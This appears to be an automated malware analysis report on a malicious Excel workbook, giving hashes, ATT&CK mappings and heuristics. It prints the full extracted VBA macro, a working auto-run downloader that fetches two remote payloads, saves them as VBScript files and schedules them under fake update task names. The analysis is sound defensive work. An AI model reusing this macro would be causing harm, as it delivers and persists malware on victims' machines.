Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 78132071d580d02f…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 14.4 KB
Created: 2018-01-04 06:59:16 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2019-01-12
MD5: 4edd901b77b576506e9396ea3edf59ce
SHA-1: 04a8ae60fae237b7a8ee1c244653e66a928f3af8
SHA-256: 78132071d580d02f75a98b83a0c7412286f51e1c34584d6ce61d324c2facc94f
Risk score: 208

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The Workbook_Open subroutine runs automatically when the workbook is opened and calls the Openn function, which uses MSXML2.serverxmlhttp to download content from two URLs built from the document's Title and Author properties. Each response body is written to a VBScript file in the user's profile directory. The macro then invokes schtasks through Shell() to schedule both files for execution, indicating downloader or dropper functionality.

Heuristics (6)

  • VBA project inside OOXML (medium, OOXML_VBA): document contains a VBA project; VBA macros present
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
  • Environ() call, environment variable access (low, OLE_VBA_ENVIRON)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1978 bytes
SHA-256: fe7fedcb22a5c07ebe652ee5634d6fc7f2326688883dc69bb8659a7e4dd7dfa7

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Openn
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Module1"
Public Function Openn()
Dim xmlhttp, myurl, myurl2 As String
Dim Titi, Aut
Set xmlhttp = CreateObject("MSXML2.serverxmlhttp")
Titi = ActiveWorkbook.BuiltinDocumentProperties("Title")
Aut = ActiveWorkbook.BuiltinDocumentProperties("Author")
myurl = Aut & Titi + ".cc/zzttzz"
xmlhttp.Open "GET", myurl, False
xmlhttp.Send
Total = xmlhttp.responsetext
' second file
myurl2 = Aut & Titi + ".cc/ccddc"
xmlhttp.Open "GET", myurl2, False
xmlhttp.Send
Total2 = xmlhttp.responsetext
Dim Fileout As Object
Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    SPath = Environ("USERPROFILE") & "\Users.v" & "bs"
    sPath2 = Environ("USERPROFILE") & "\Profile.vb" + "s"
    Set Fileout = fso.CreateTextFile(SPath, True, True)
    Fileout.Write Total
    Fileout.Close
    Set Fileout = fso.CreateTextFile(sPath2, True, True)
    Fileout.Write Total2
    Fileout.Close
    Ora_X = TimeValue("" & Hour(Now) & ":" & Minute(Now) + 1 & ":" & Second(Now))
PKill2 = "Schtasks /Create /SC ONCE /ST " & Ora_X & " /TN ""Google Chrome Update"" /TR " & sPath2 & " /F"
PKill = "Schtasks /Create /SC minute /mo 10 /TN ""OfficeUpdate"" /TR " & SPath & " /F"
Shell (PKill2)
Shell (PKill)
End Function


Attribute VB_Name = "Module2"

Attribute VB_Name = "Module3"

vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes
SHA-256: 2bccf4fc8ec07916b292ec407b5a67e617957bfa3e14ae6d180214abb0614938